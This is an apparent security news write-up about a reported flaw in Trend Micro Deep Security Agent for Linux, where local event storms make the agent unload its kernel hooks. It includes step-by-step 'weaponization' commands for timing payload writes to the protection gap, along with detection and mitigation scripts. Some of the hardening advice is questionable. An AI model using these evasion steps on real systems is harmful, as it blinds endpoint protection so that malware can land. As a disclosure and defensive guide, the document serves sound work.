Introduction:
A newly discovered design flaw in Trend Micro’s Deep Security Agent for Linux enables a local, unprivileged attacker to create repeatable blind spots in endpoint protection by forcing the agent to unload its own kernel monitoring modules. The vulnerability lies in how the `ds_am.init` component handles high-frequency local event loads, intentionally invoking `rmmod` on the `bmhook` and `tmhook` kernel modules—rather than simply throttling telemetry—which creates a temporary window of 1–2 seconds where `tmhook` is completely absent and up to 20 seconds where behavior monitoring is degraded.
Learning Objectives:
– Understand how an unprivileged local attacker can trigger a repeatable security bypass by generating high-volume filesystem and process events.
– Learn to detect the protection gap using Linux kernel auditing tools, `bpftrace`, and Trend Micro’s own CLI.
– Master offensive and defensive techniques, including forcing module reloads, detecting `rmmod` invocations, and implementing mitigation strategies.
You Should Know:
1. Anatomy of the Bypass: Forcing `bmhook` and `tmhook` to Unload
The vulnerability stems from how Deep Security Agent’s behavior-monitoring pipeline responds to sustained local activity. When a local process generates a high rate of filesystem operations (create, write, truncate, rename, symlink) and process events (fork, exit), the `ds_am.init` component does not simply throttle—it deliberately unloads the monitoring modules. This creates a repeatable protection gap rather than a one‑off stability glitch.
Step‑by‑step guide to reproducing (research/authorized testing only):
1. Identify vulnerable versions: The issue affects agents where `tmhook` version is 1.2.2129 and `bmhook` version is 1.2.2120.2129, observed on Ubuntu with kernel 6.8.0.
2. Monitor kernel messages in real time: Before triggering the event storm, open a terminal and run:
```bash
sudo dmesg -w | grep -E "livepatch|tmhook|bmhook|rmmod"
```
This captures the livepatch transition messages when the agent unloads modules.
3. Generate a high-volume event storm (Proof-of-Concept): A simple C program that repeatedly creates, writes, truncates, renames, and deletes files in a loop, while also forking and exiting child processes, can trigger the bypass. The original research used a C‑based PoC that hammered file operations and `fork`/`exit` loops.
4. Observe the unload pattern: In `dmesg`, you will see:
```
livepatch: 'tmhook': starting unpatching transition
livepatch: signaling remaining tasks
livepatch: 'tmhook': unpatching complete
tmhook: tmhook 1.2.2129 unloaded
```
Followed later by:
```
livepatch: enabling patch 'tmhook'
livepatch: 'tmhook': patching complete
tmhook: tmhook 1.2.2129 loaded
```
The entire livepatch transition takes roughly 20 seconds, with a 1–2 second window where `tmhook` is completely absent from the kernel.
5. Detect the bypass window with `bpftrace`: To confirm deliberate unloading via `rmmod`, attach a `bpftrace` script:
```bash
sudo bpftrace -e 'tracepoint:syscalls:sys_enter_execve /comm == "ds_am.init"/ { printf("ds_am.init executing: %s\n", str(args->filename)); }'
```
The output will show `ds_am.init` spawning `/usr/sbin/rmmod` to unload `bmhook` and `tmhook`.
6. Attempt to write a normally blocked artifact during the window: While the modules are unloaded, attempt to write a test malware signature or download a known indicator to disk. In the baseline state, the agent blocks this; during the reload window, the artifact successfully lands and persists.
What this does: The bypass creates a temporary but repeatable blind spot in endpoint protection. An attacker with local unprivileged access can stage malware, unpack payloads, or execute post‑exploitation components that would normally be blocked.
2. Offensive Weaponization: From Local Foothold to Payload Landing
For an attacker who already has a low-privileged foothold on a Linux system protected by Trend Micro Deep Security Agent, this vulnerability provides a reliable method to drop tooling or malware that would otherwise be immediately blocked. The key is timing: the attacker must synchronize the payload writing or execution with the 1–2 second window when `tmhook` is absent.
Step‑by‑step guide to weaponization (authorized testing only):
1. Enumerate the environment: Check if the Trend Micro agent is running and identify the module versions:
```bash
lsmod | grep -E "tmhook|bmhook"
modinfo tmhook | grep version
ps aux | grep ds_am.init
```
2. Trigger the event storm from a low-privileged user: The original research showed that a local unprivileged process can generate enough pressure. A simple shell loop may suffice:
```bash
# Create a high-volume filesystem event storm
for i in {1..100000}; do
  touch /tmp/test_$i
  echo "data" > /tmp/test_$i
  rm -f /tmp/test_$i
  ( : ) &
done
```
For a more reliable trigger, a C program using `fork()` in a tight loop combined with file operations is more effective.
3. Monitor for module disappearance: In a separate terminal, poll for `tmhook` presence:
```bash
while true; do lsmod | grep tmhook > /dev/null && echo "tmhook present" || echo "tmhook GONE"; sleep 0.1; done
```
This will show the 1–2 second gap.
4. Simultaneously write the payload: In a third terminal, attempt to write a test artifact repeatedly:
```bash
while true; do echo "malicious_payload" > /tmp/evasion_test.txt; done
```
During the gap, the write succeeds; outside the gap, it is blocked.
5. Verify persistence: After the modules reload, check if the artifact remains:
```bash
ls -la /tmp/evasion_test.txt
```
If the file exists, the bypass was successful.
3. Detection and Monitoring: Catching the Unload Event
Defenders can detect this bypass by monitoring for `rmmod` executions against the `tmhook` and `bmhook` modules, as well as by observing livepatch transition messages in kernel logs.
Step‑by‑step guide to detection:
1. Monitor for `rmmod` invocations using `auditd`:
```bash
sudo auditctl -a always,exit -S execve -F path=/usr/sbin/rmmod -k rmmod_event
```
Then search the audit log:
```bash
sudo ausearch -k rmmod_event
```
2. Create a systemd service to alert on module unload: Write a script that checks `lsmod` every second and logs if `tmhook` or `bmhook` disappear:
```bash
#!/bin/bash
# Poll the module table once a second and log when either hook module is missing
while true; do
  for mod in tmhook bmhook; do
    if ! lsmod | grep -q "^${mod} "; then
      logger "ALERT: ${mod} module unloaded - potential bypass attempt"
    fi
  done
  sleep 1
done
```
3. Use `bpftrace` to trace `module_free` events: This confirms real module removal rather than a cosmetic state change:
```bash
# The module:module_free tracepoint fires from the kernel's module teardown path and carries the module name
sudo bpftrace -e 'tracepoint:module:module_free { printf("Module %s freed\n", str(args->name)); }'
```
4. Set up SIEM alerting on `dmesg` patterns: Forward kernel logs to a SIEM and create alerts for the string `"livepatch: 'tmhook': unpatching complete"` followed within 30 seconds by `"livepatch: 'tmhook': patching complete"`.
5. Use Trend Micro’s own CLI to check agent health: The Deep Security Agent CLI can report module status:
```bash
/opt/ds_agent/dsa_control -r dsa_query -c
```
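The unload pattern from section 1 and the SIEM rule in step 4 above can be turned into a small correlator. The following Python script is an added example, not code from the article, from the original researcher, or from Trend Micro: it groups the `livepatch`/`tmhook` kernel messages into unload-reload cycles per module, measures the window in which the module was absent and the length of the whole transition, applies the 30-second "unpatching complete ... patching complete" rule, and annotates a hit when an exec trace (in the shape printed by the `bpftrace` one-liner in section 1) shows `ds_am.init` spawning `rmmod`. The log lines embedded in it are constructed for the example; their message text follows the strings quoted in the article, with dmesg-style timestamps prepended.

```python
"""Correlate kernel-log and exec-trace lines to flag a tmhook/bmhook unload-reload cycle.

Added example, not code from the article or from Trend Micro. SAMPLE_DMESG and
SAMPLE_EXEC_TRACE are constructed inputs; feed real data with e.g.
    find_unload_cycles(open("/var/log/kern.log").read())
on a host where the timestamp prefix matches TS_RE.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: message text as quoted in the article, "[seconds.millis]" prefix added.
SAMPLE_DMESG = """\
[1000.000] livepatch: 'tmhook': starting unpatching transition
[1000.010] livepatch: signaling remaining tasks
[1017.900] livepatch: 'tmhook': unpatching complete
[1018.000] tmhook: tmhook 1.2.2129 unloaded
[1019.300] livepatch: enabling patch 'tmhook'
[1019.500] livepatch: 'tmhook': patching complete
[1019.600] tmhook: tmhook 1.2.2129 loaded
[5000.000] livepatch: 'tmhook': starting unpatching transition
"""

# Constructed sample in the shape printed by the execve bpftrace one-liner in section 1.
SAMPLE_EXEC_TRACE = """\
ds_am.init executing: /usr/sbin/rmmod
ds_am.init executing: /usr/sbin/rmmod
"""

TS_RE = re.compile(r"^\[\s*(?P<ts>\d+\.\d+)\]\s*(?P<msg>.*)$")
EVENTS = {
    "unpatch_start": re.compile(r"livepatch: '(?P<mod>\w+)': starting unpatching transition"),
    "unpatch_done": re.compile(r"livepatch: '(?P<mod>\w+)': unpatching complete"),
    "unloaded": re.compile(r"^(?P<mod>\w+): \w+ [\d.]+ unloaded$"),
    "patch_done": re.compile(r"livepatch: '(?P<mod>\w+)': patching complete"),
    "loaded": re.compile(r"^(?P<mod>\w+): \w+ [\d.]+ loaded$"),
}


@dataclass
class UnloadCycle:
    module: str
    unpatch_start: Optional[float] = None
    unpatch_done: Optional[float] = None
    unloaded: Optional[float] = None
    patch_done: Optional[float] = None
    loaded: Optional[float] = None

    @property
    def complete(self) -> bool:
        return self.unpatch_done is not None and self.patch_done is not None

    def absent_window(self) -> Optional[float]:
        """Seconds during which the module was not in the kernel at all."""
        if self.unloaded is None or self.loaded is None:
            return None
        return round(self.loaded - self.unloaded, 3)

    def transition_seconds(self) -> Optional[float]:
        """Seconds from the start of unpatching to the end of re-patching."""
        if self.unpatch_start is None or self.patch_done is None:
            return None
        return round(self.patch_done - self.unpatch_start, 3)


def find_unload_cycles(dmesg_text: str) -> List[UnloadCycle]:
    """Group livepatch/module messages into one UnloadCycle per module per transition."""
    cycles: List[UnloadCycle] = []
    open_cycles: Dict[str, UnloadCycle] = {}
    for line in dmesg_text.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue
        ts, msg = float(m.group("ts")), m.group("msg")
        for kind, pattern in EVENTS.items():
            em = pattern.search(msg)
            if not em:
                continue
            mod = em.group("mod")
            cycle = open_cycles.get(mod)
            # A new "starting unpatching transition" opens a fresh cycle for that module
            if cycle is None or (kind == "unpatch_start" and cycle.unpatch_start is not None):
                cycle = UnloadCycle(module=mod)
                open_cycles[mod] = cycle
                cycles.append(cycle)
            setattr(cycle, kind, ts)
            break
    return cycles


def alerts(cycles: List[UnloadCycle], exec_trace: str = "", max_gap: float = 30.0) -> List[str]:
    """Step-4 rule: 'unpatching complete' followed by 'patching complete' within max_gap seconds."""
    rmmod_execs = sum(1 for ln in exec_trace.splitlines()
                      if ln.startswith("ds_am.init executing: ") and ln.rstrip().endswith("/rmmod"))
    out: List[str] = []
    for c in cycles:
        if not c.complete:
            continue  # still in progress (or truncated log): nothing to correlate yet
        gap = c.patch_done - c.unpatch_done
        if gap <= max_gap:
            msg = (f"{c.module}: unpatched->repatched in {gap:.1f}s "
                   f"(absent {c.absent_window()}s, full transition {c.transition_seconds()}s)")
            if rmmod_execs:
                msg += f"; ds_am.init spawned rmmod {rmmod_execs}x"
            out.append(msg)
    return out


if __name__ == "__main__":
    for a in alerts(find_unload_cycles(SAMPLE_DMESG), SAMPLE_EXEC_TRACE):
        print("ALERT", a)
```

The incomplete second cycle in the sample (a transition that has started but not finished) is deliberately not alerted on; in production that state is worth a separate "unload in progress" signal, since that is exactly the window the article describes.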
4. Mitigation and Hardening: Closing the Gap Until a Patch is Released
As of June 3, 2026, Trend Micro has not assigned a CVE or released a confirmed fix timeline, despite the finding being reported on February 6, 2026. Until an official patch is available, defenders must implement compensating controls.
Step‑by‑step guide to mitigation:
1. Limit local unprivileged process event rates using `cgroups`: Create a cgroup that caps fork and file operation rates for untrusted workloads:
```bash
sudo mkdir -p /sys/fs/cgroup/system.slice/restricted
# A child cgroup can only use controllers its parent delegates via cgroup.subtree_control
echo "+pids +io" | sudo tee /sys/fs/cgroup/system.slice/cgroup.subtree_control
echo 1000 | sudo tee /sys/fs/cgroup/system.slice/restricted/pids.max
# io.max takes "MAJOR:MINOR key=value"; 8:0 is a placeholder for the device untrusted users write to
echo "8:0 wiops=10000" | sudo tee /sys/fs/cgroup/system.slice/restricted/io.max
```
Then place untrusted processes into this cgroup.
2. Enforce SELinux or AppArmor policies to restrict `rmmod`: Create a custom SELinux policy that prevents `ds_am.init` from executing `rmmod`:
```bash
sudo ausearch -c ds_am.init --raw | audit2allow -M my-ds_am-init
sudo semodule -i my-ds_am-init.pp
```
Note that `audit2allow` turns logged denials into allow rules; use the generated `.te` file only as the scaffold for the module and edit it so that `ds_am.init`'s domain is not granted execute access to `rmmod` before building and installing it.
3. Harden the kernel module loading interface: Restrict `rmmod` to root only (it already requires root, but ensure no sudoers overrides):
```bash
sudo chmod 750 /usr/sbin/rmmod
```
4. Deploy a lightweight eBPF-based monitor that hooks `module_free` and alerts immediately when `tmhook` or `bmhook` are unloaded.
5. Isolate critical workloads from untrusted local users using virtualization or containers. The bypass requires local access, so preventing local footholds remains the primary defense.
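Step 1 of the mitigation list above writes cgroup v2 control files by hand. The following Python script is an added example, not code from the article or from Trend Micro, that does the same job with the checks a practitioner would want: it confirms the unified hierarchy is mounted, verifies that the `pids` and `io` controllers are available to the parent cgroup, delegates them through `cgroup.subtree_control`, writes `pids.max` and an `io.max` line in the controller's real `MAJOR:MINOR key=value` format, and moves PIDs into the leaf. `cgroup_root` is a parameter so the `demo()` function can exercise the logic against a scratch directory without root; the `8:0` device number is a placeholder, not a value from the article.

```python
"""Create a cgroup v2 leaf that rate-limits untrusted local processes.

Added example, not code from the article or from Trend Micro. On a real host call
create_restricted_cgroup(Path("/sys/fs/cgroup")) as root; demo() runs the same logic
against a fake tree in a temporary directory.
"""
import tempfile
from pathlib import Path
from typing import Dict, Iterable, Optional

# Placeholder block device (MAJOR:MINOR) for the filesystem untrusted users can write to;
# find the real one with `stat -c %t:%T` on the mount point (hex) or `lsblk`.
DEFAULT_IO_DEVICE = "8:0"


def _write(path: Path, value: str) -> None:
    # cgroup control files want the whole setting in a single write
    path.write_text(value + "\n")


def create_restricted_cgroup(cgroup_root: Path, parent: str = "system.slice",
                             name: str = "restricted", pids_max: int = 1000,
                             wiops: Optional[int] = 10000,
                             io_device: str = DEFAULT_IO_DEVICE) -> Dict[str, str]:
    """Create <root>/<parent>/<name> with pids.max and (optionally) io.max set; return the limits."""
    root = Path(cgroup_root)
    if not (root / "cgroup.controllers").exists():
        raise RuntimeError("cgroup v2 unified hierarchy not mounted at %s" % root)
    parent_dir = root / parent
    available = set((parent_dir / "cgroup.controllers").read_text().split())
    wanted = {"pids"} | ({"io"} if wiops is not None else set())
    missing = wanted - available
    if missing:
        raise RuntimeError("controllers unavailable in %s: %s" % (parent, ", ".join(sorted(missing))))
    # A child can only use controllers the parent has enabled in its cgroup.subtree_control
    _write(parent_dir / "cgroup.subtree_control", " ".join("+" + c for c in sorted(wanted)))
    leaf = parent_dir / name
    leaf.mkdir(exist_ok=True)
    limits = {"pids.max": str(pids_max)}
    if wiops is not None:
        # io.max lines are "MAJOR:MINOR key=value ..."; wiops caps write IOPS on that device
        limits["io.max"] = "%s wiops=%d" % (io_device, wiops)
    for fname, value in limits.items():
        _write(leaf / fname, value)
    return limits


def confine_pids(cgroup_root: Path, pids: Iterable[int], parent: str = "system.slice",
                 name: str = "restricted") -> int:
    """Move processes into the leaf; cgroup.procs accepts one PID per write."""
    procs = Path(cgroup_root) / parent / name / "cgroup.procs"
    count = 0
    for pid in pids:
        with procs.open("a") as fh:
            fh.write("%d\n" % pid)
        count += 1
    return count


def demo(controllers: str = "io memory pids") -> Dict[str, str]:
    """Run the setup against a constructed fake cgroup tree and return what was written."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cgroup.controllers").write_text("cpu io memory pids\n")
        parent = root / "system.slice"
        parent.mkdir()
        (parent / "cgroup.controllers").write_text(controllers + "\n")
        (parent / "cgroup.subtree_control").write_text("\n")
        limits = create_restricted_cgroup(root)
        moved = confine_pids(root, [4242, 4243])  # constructed PIDs
        leaf = parent / "restricted"
        return {
            "subtree_control": (parent / "cgroup.subtree_control").read_text().strip(),
            "pids.max": (leaf / "pids.max").read_text().strip(),
            "io.max": (leaf / "io.max").read_text().strip(),
            "procs": (leaf / "cgroup.procs").read_text().strip(),
            "moved": str(moved),
            "limits": " ".join("%s=%s" % kv for kv in sorted(limits.items())),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-16s %s" % (k, v))
```

Two caveats a practitioner should keep in mind: `pids.max` caps the number of live tasks, which bounds the `fork`/`exit` storm but does not by itself limit how fast a single process can issue file operations; and the `io` controller throttles at the block layer, so writes that stay in the page cache (or land on `tmpfs`) are not slowed by `io.max`.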
5. Broader Context: EDR Kernel‑Module Weaknesses
This vulnerability is not an isolated incident. Security researchers have demonstrated that many Linux EDRs rely on Loadable Kernel Modules (LKMs) for syscall hooking, and weaknesses in module cleanup and reload logic are increasingly being exploited. The `UnhookingLinuxEdr` project, for instance, has shown how to manipulate the `cleanup_module` function of kernel modules to disable monitoring. Additionally, tools like `RingReaper` use `io_uring` to bypass traditional syscall hooks entirely. The Trend Micro flaw adds a new dimension: forcing the EDR to unload itself through resource exhaustion.
What Undercode Say:
– Key Takeaway 1: A local unprivileged attacker can create a repeatable 1–2 second window where `tmhook` (the livepatch syscall hook) is completely absent, allowing malicious files or processes that would normally be blocked to land successfully.
– Key Takeaway 2: The vulnerability is not a crash but an intentional recovery path in `ds_am.init` that calls `rmmod` when overwhelmed—this design choice turns a performance protection mechanism into a security gap.
– Analysis: While the blast radius is limited to systems where an attacker already has local access, the repeatability of the bypass makes it highly useful for post‑exploitation. Attackers can now reliably stage tooling without fear of immediate EDR blocking. The absence of a CVE or patch timeline from Trend Micro as of early June 2026 is concerning, especially given that the finding was reported in February. Organizations should prioritize detecting `rmmod` executions against these modules and consider moving critical Linux workloads to alternative endpoint protection solutions or implementing strict eBPF-based monitoring as a compensating control. The vulnerability also highlights a broader industry trend: EDRs that rely on kernel modules must carefully audit their resource‑management logic under adversarial conditions.
Prediction:
– -1 This vulnerability undermines trust in kernel‑based EDRs for Linux, as it demonstrates that even market‑leading solutions can be forced into self‑induced blind spots through ordinary local activity.
– -1 Expect exploit code to be weaponized in post‑exploitation frameworks (e.g., Metasploit, Cobalt Strike) within the next 3–6 months, targeting Linux environments in data centers and cloud workloads.
– -1 Regulators and compliance frameworks (PCI-DSS, HIPAA, FedRAMP) may require compensating controls for any Linux endpoint protection that uses LKM syscall hooks, increasing operational costs.
– +1 The disclosure will drive innovation in eBPF-based monitoring, which is more resilient to this class of module‑unloading attacks because eBPF programs are verified and run in a safer kernel context.
– -1 If Trend Micro does not release a patch quickly, organizations may migrate away from Deep Security Agent, disrupting the vendor’s market share in the Linux endpoint protection space.
– +1 Blue teams will develop new detection rules for high‑rate local event storms combined with `rmmod` executions, improving overall Linux threat hunting capabilities.
IT/Security Reporter URL:
Reported By: [Linux Cybersecuritnews](https://www.linkedin.com/posts/linux-cybersecuritnews-share-7468644005774262273-27_2/) – Hackers Feeds